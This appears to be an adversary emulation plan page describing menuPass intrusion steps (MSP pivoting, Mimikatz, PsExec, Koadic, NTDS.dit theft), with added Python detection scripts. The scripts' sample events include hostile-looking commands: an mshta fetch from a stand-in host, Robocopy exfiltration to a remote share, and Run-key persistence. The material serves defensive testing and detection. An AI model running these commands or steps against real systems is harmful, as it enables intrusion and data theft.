Operations_Flow.md
menuPass Operations Flow

Please see the formal menuPass Intelligence Summary, which includes a breakdown of the cited intelligence used for each step of this emulation. The menuPass emulation is split into two distinct scenarios, Scenario 1 and Scenario 2.

[Figure: menuPass operations flow diagram (/menuPass/Emulation_Plan/OpFlow_Diagram.png)]

Reconnaissance and Resource Development

Due to the wealth of publicly available information in this regard, reconnaissance and resource development considerations have been summarized. While not necessary, if you have the resources to emulate this activity and intend to do so while remaining operationally representative, the information provided may be beneficial. Information gathering, capability development, weaponization, and infrastructure are discussed at a high level to give context to the emulation and serve as a reference for the emulation team.

Scenario 1

Scenario 1 prescribes TTPs similar to those attributed to menuPass specific to the group's efforts targeting MSP subscriber networks.

menuPass is reported to have compromised MSP networks with the intent of abusing trust relationships to pivot into subscriber networks [4, 5, 6, 7, 10, 12]. The attackers traversed MSP networks in search of shared infrastructure. This infrastructure was compromised and used as a pivot point into the subscriber network. menuPass is commonly reported to have accessed subscriber networks with legitimate but compromised MSP or subscriber domain credentials [4, 5, 6, 7, 10, 12].

Initial Access

To emulate initial access, you may elect to assess the feasibility of trusted relationship abuse by enumerating shared infrastructure and services that could serve as a foothold into your networks.

You may also assume breach by providing the emulation team with a VPN/RDP connection. menuPass is reported to have initially accessed MSP subscriber networks with elevated permissions, so the emulation team should do the same [4, 5, 6, 7, 10, 12]. The intent of this scenario is to assess your organization's ability to protect, detect, and defend against execution, tool ingress, discovery, credential access, lateral movement, persistence, collection, and exfiltration, and thereby encourage defense in depth. The YAML file does not address initial access; this procedure is left to the discretion of the emulation team.

Tool Ingress

After establishing a point of presence on the target network, menuPass actors are commonly reported to have introduced an operational toolkit from attacker-controlled infrastructure. This operational toolkit enables the attackers to pursue operational objectives and will enable the emulation team to pursue the subsequent steps in this scenario.

Discovery

Once the operational toolkit has been introduced to the operating environment, the emulation team will conduct discovery with the intent of identifying opportunities while attempting to blend in with routine administrative tasks. The emulation team should enumerate the network and Active Directory (AD) with the intent of identifying opportunities for credential access and lateral movement. This is also the time to begin searching for systems of interest and identifying approaches to these systems.

Credential Access

This objective should be pursued in parallel with discovery [4]. Reporting suggests that the credentials used by menuPass to pivot into target networks provided elevated permissions. Other reporting details menuPass's use of exploits to achieve initial access; some of these exploits may have resulted in code execution in an elevated context. In either case, the need for privilege escalation has already been satisfied, and the actors may instead be interested in pursuing credential access in order to ensure freedom of movement throughout the domain [4]. menuPass actors are thought to have compromised additional credentials using publicly available tools like Mimikatz and Secretsdump [4].

Lateral Movement

After performing discovery and compromising additional credentials, the emulation team should attempt lateral movement to systems of interest using tools indicative of routine administrative tasks.

menuPass is reported to have accessed remote systems by mounting remote network shares, using RDP to console into remote machines, and by using tools like PsExec to achieve remote code execution. menuPass actors are reported to have used these techniques to deploy their sustained malware to remote systems and subsequently establish C2 [4]. After C2 was established with the system of interest, menuPass actors are reported to have confirmed network connectivity and conducted situational awareness checks.

Collection and Staging

After successfully establishing a point of presence on the remote system of interest, menuPass actors are then reported to have browsed the file system in search of information. This information was subsequently compressed and staged for exfiltration, often in the Recycle Bin [4].

Exfiltration

The compressed archives are then reported to have been exfiltrated from the victim network by mounting a remote network share and copying the files out of the network, or by using tools like PuTTY and/or Robocopy to transfer the data [4].
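Each Scenario 1 step above, from tool ingress through exfiltration, leaves a host-level trace that a detection engineer can key on: a PsExec service installation, an interactive RDP logon by an MSP account, an archive written under the Recycle Bin by something other than Explorer, and a copy tool launched against a UNC path. The Python below is an added example written for this page; it is not part of the emulation plan, its YAML, or any referenced tool. The event dictionaries and their field names, the MSP account watchlist, the archive extensions and the copy-tool list are all constructed assumptions, loosely modelled on Sysmon (Event IDs 1 and 11), System log (7045) and Security log (4624) fields.

```python
import ntpath
import re
from collections import defaultdict
from typing import Callable, Dict, List, Optional

Event = Dict[str, object]

# Constructed watchlist of MSP/vendor accounts whose interactive logons inside
# the subscriber network should be rare (an assumption for this example).
MSP_ACCOUNTS = {"corp\\msp-admin"}
ARCHIVE_EXTS = (".rar", ".zip", ".7z", ".cab")
COPY_TOOLS = {"robocopy.exe", "pscp.exe", "psftp.exe"}  # Robocopy and PuTTY's copy tools
UNC_PATH = re.compile(r"\\\\[\w.\-]+\\\S+")            # \\host\share...

# Constructed, simplified event records. Field names are an assumption loosely
# modelled on Sysmon (id 1 = process create, 11 = file create), the System log
# (7045 = service installed) and the Security log (4624 = logon).
SAMPLE_EVENTS: List[Event] = [
    {"id": 7045, "host": "FS01", "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 4624, "host": "FS01", "logon_type": 10, "user": "CORP\\msp-admin",
     "src_ip": "10.20.30.40"},
    {"id": 11, "host": "FS01", "image": r"C:\Windows\System32\cmd.exe",
     "target_file": r"C:\$Recycle.Bin\S-1-5-21-111\data.rar"},
    {"id": 1, "host": "FS01", "image": r"C:\Windows\System32\Robocopy.exe",
     "command_line": r"Robocopy.exe C:\$Recycle.Bin\S-1-5-21-111 \\203.0.113.5\share /E"},
    # Benign controls: Explorer deleting a document, Robocopy between local drives.
    {"id": 11, "host": "WS02", "image": r"C:\Windows\explorer.exe",
     "target_file": r"C:\$Recycle.Bin\S-1-5-21-222\$RABC123.docx"},
    {"id": 1, "host": "WS02", "image": r"C:\Windows\System32\Robocopy.exe",
     "command_line": r"Robocopy.exe D:\backup E:\backup /MIR"},
]


def _image_name(ev: Event) -> str:
    # ntpath handles Windows separators regardless of the analyst's own OS.
    return ntpath.basename(str(ev.get("image", ""))).lower()


def check_psexec_service(ev: Event) -> Optional[str]:
    """Service install whose name or binary matches PsExec's PSEXESVC."""
    if ev.get("id") != 7045:
        return None
    text = f"{ev.get('service_name', '')} {ev.get('image_path', '')}".upper()
    return "psexec_service_install" if "PSEXESVC" in text else None


def check_msp_rdp_logon(ev: Event) -> Optional[str]:
    """RemoteInteractive (logon type 10) logon by a watch-listed MSP account."""
    if ev.get("id") != 4624 or ev.get("logon_type") != 10:
        return None
    return "msp_account_rdp_logon" if str(ev.get("user", "")).lower() in MSP_ACCOUNTS else None


def check_recycle_bin_staging(ev: Event) -> Optional[str]:
    """Archive written under $Recycle.Bin by something other than Explorer."""
    if ev.get("id") != 11:
        return None
    path = str(ev.get("target_file", "")).lower()
    if "$recycle.bin" in path and path.endswith(ARCHIVE_EXTS) and _image_name(ev) != "explorer.exe":
        return "archive_staged_in_recycle_bin"
    return None


def check_remote_copy(ev: Event) -> Optional[str]:
    """Copy tool launched with a UNC source or destination on its command line."""
    if ev.get("id") != 1:
        return None
    cmd = str(ev.get("command_line", ""))
    if _image_name(ev) in COPY_TOOLS and UNC_PATH.search(cmd):
        return "copy_tool_to_remote_share"
    return None


CHECKS: List[Callable[[Event], Optional[str]]] = [
    check_psexec_service, check_msp_rdp_logon, check_recycle_bin_staging, check_remote_copy,
]


def run_detections(events: List[Event]) -> List[Event]:
    """Apply every check to every event; one alert per (event, matching check)."""
    alerts: List[Event] = []
    for ev in events:
        for check in CHECKS:
            category = check(ev)
            if category:
                alerts.append({"host": ev["host"], "category": category, "event": ev})
    return alerts


def hosts_with_chain(alerts: List[Event], min_stages: int = 2) -> List[str]:
    """Hosts that show at least min_stages distinct stages of the Scenario 1 chain."""
    stages = defaultdict(set)
    for alert in alerts:
        stages[alert["host"]].add(alert["category"])
    return sorted(host for host, seen in stages.items() if len(seen) >= min_stages)


if __name__ == "__main__":
    found = run_detections(SAMPLE_EVENTS)
    for alert in found:
        print(f"{alert['host']}: {alert['category']}")
    print("hosts with a multi-stage chain:", hosts_with_chain(found))
```

Taken individually, each check is noisy in an MSP-managed environment (RDP by vendor accounts and Robocopy to shares are routine), which is why hosts_with_chain only escalates a host once two or more distinct stages of the chain appear on it; the per-check alerts remain useful as context for the analyst.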


Scenario 2

Scenario 2 prescribes TTPs publicly attributed to menuPass that entail the pursuit of operational objectives using a command-and-control framework. This scenario is intended to assess your organization's ability to protect, detect, and defend against execution, discovery, privilege escalation, credential access, lateral movement, exfiltration, command and control, and persistence conducted through a C2 framework. Amongst other tactical implants, menuPass is reported to have used Koadic C3. This publicly available C2 framework relies on Windows Scripting Host to conduct most of its operations. This tool will be used to pursue tactical objectives with the operational objective of exfiltrating/simulating exfiltration.

Initial Access

menuPass is reported to have deployed tactical implants by spearphishing. Spearphishing emails attributed to menuPass typically featured a weaponized attachment that, when opened, would exploit a vulnerability, direct the recipient to run an embedded macro, or direct the recipient to click a link to download and execute a file. Each of these vectors was responsible for deploying menuPass malware and establishing command and control [4].

Execution

If you have the resources to dedicate to emulating a phishing campaign, please do so. We have suggested an execution event that situates a tactical implant (Koadic C3) in memory and establishes C2. This implant will be used to accomplish the subsequent steps in this scenario.

Discovery

After establishing C2, menuPass actors are reported to have conducted situational awareness checks by accessing the Windows command-line. You may also elect to conduct discovery with the intent of identifying systems of interest, staging points, and viable points of persistence.

Privilege Escalation

In the event that the assessing team is unable to escalate privileges, this event can be “white-carded” with the granting of administrative rights to the compromised account. This white-carded event could enable the assessing team to escalate via credential access, as most of the credential access procedures described hereafter require elevated privileges. You may also elect to use Koadic's "elevate" modules to achieve execution in an elevated context.

Credential Access

Much like Scenario 1, we will seek to access additional credentials to ensure freedom of movement. This step differs from credential access in Scenario 1 as we will be using our tactical implant to achieve credential access.

In some instances, menuPass actors are reported to have copied and exfiltrated the Active Directory database file (NTDS.dit). This level of credential access ensures freedom of movement throughout the domain.

Lateral Movement and Exfiltration

The credentials used in the previous step will be coupled with modules native to Koadic to move laterally to systems of interest and conduct exfiltration/simulate exfiltration.

C2 and Persistence

menuPass is reported to have deployed sustained malware to strategic systems within the compromised environment to ensure long-term persistent access to the network [4, 5, 6, 7, 10, 12]. In this step, we use Koadic and/or the Windows command-line to ingress sustained malware. menuPass is widely reported to have used the publicly available QuasarRAT.
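Because Koadic runs through Windows Scripting Host, the thread that ties the Scenario 2 steps together on the endpoint is process ancestry: a script host spawned under an Office application (the spearphishing attachment from Initial Access), and then discovery commands, NTDS.dit access and persistence changes all descending from that script host. The Python below is an added example for this page and is not code from the emulation plan or from Koadic. Its assumptions are constructed: the process records and field names (loosely modelled on Sysmon Event ID 1), that the stager is launched via mshta/wscript/cscript (Koadic's stagers are commonly delivered through such hosts, but the plan does not say which), that NTDS.dit was copied with ntdsutil, vssadmin or esentutl (the plan does not say how), and that QuasarRAT persistence lands in a Run key (the plan does not say how it persists). The whole tree is flattened onto one host for brevity.

```python
import ntpath
from typing import Dict, List, Optional, Tuple

Proc = Dict[str, object]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Windows Scripting Host binaries; assumed launch vector for a Koadic stager.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Utilities that can copy NTDS.dit from a live domain controller (assumed methods).
NTDS_TOOLS = {"ntdsutil.exe", "vssadmin.exe", "esentutl.exe"}
RUN_KEY = r"\currentversion\run"  # Run-key autostart, assumed persistence method

# Constructed process-creation records, not a real log export.
PROCESSES: List[Proc] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": '"WINWORD.EXE" invoice.docm'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta http://203.0.113.9/stage"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c whoami && ipconfig /all"},
    {"pid": 500, "ppid": 300, "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmd": "ntdsutil"},
    {"pid": 600, "ppid": 300, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svc /d C:\Users\u\svc.exe"},
    # Benign control: an administrator running a script from a console session.
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 800, "ppid": 700, "image": r"C:\Windows\System32\cscript.exe",
     "cmd": r"cscript C:\scripts\inventory.vbs"},
]


def _name(p: Proc) -> str:
    return ntpath.basename(str(p["image"])).lower()


def build_index(procs: List[Proc]) -> Dict[int, Proc]:
    return {int(p["pid"]): p for p in procs}


def ancestors(pid: int, index: Dict[int, Proc]) -> List[Proc]:
    """Parent, grandparent, ... until the chain leaves the index."""
    chain: List[Proc] = []
    p = index.get(pid)
    while p is not None and p["ppid"] in index:
        p = index[p["ppid"]]
        chain.append(p)
    return chain


def is_office_spawned_script_host(p: Proc, index: Dict[int, Proc]) -> bool:
    """Script host with an Office application anywhere in its ancestry."""
    return _name(p) in SCRIPT_HOSTS and any(
        _name(a) in OFFICE_APPS for a in ancestors(int(p["pid"]), index))


def implant_root(p: Proc, index: Dict[int, Proc]) -> Optional[Proc]:
    """Nearest Office-spawned script host at or above p, if any."""
    for candidate in [p] + ancestors(int(p["pid"]), index):
        if is_office_spawned_script_host(candidate, index):
            return candidate
    return None


def classify(p: Proc, index: Dict[int, Proc]) -> Optional[str]:
    """Label a process by its relationship to a suspected implant root."""
    root = implant_root(p, index)
    if root is None:
        return None
    if root is p:
        return "office_to_script_host"
    name, cmd = _name(p), str(p["cmd"]).lower()
    if name in NTDS_TOOLS:
        return "ntds_access_under_implant"
    if name == "reg.exe" and RUN_KEY in cmd:
        return "run_key_persistence_under_implant"
    return "child_of_implant"


def triage(procs: List[Proc]) -> List[Tuple[int, str]]:
    """(pid, verdict) for every process that sits under an Office-spawned script host."""
    index = build_index(procs)
    results: List[Tuple[int, str]] = []
    for p in procs:
        verdict = classify(p, index)
        if verdict:
            results.append((int(p["pid"]), verdict))
    return results


if __name__ == "__main__":
    for pid, verdict in triage(PROCESSES):
        print(pid, verdict)
```

The ancestry test is what keeps the administrator's cscript run (pid 800) out of the results: the same binary is flagged only when an Office process sits above it. In practice the same classification generalises to any child of the implant, so a single "child_of_implant" verdict on a domain controller is already worth an analyst's attention before the more specific NTDS or Run-key labels appear.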


Additional Plan Resources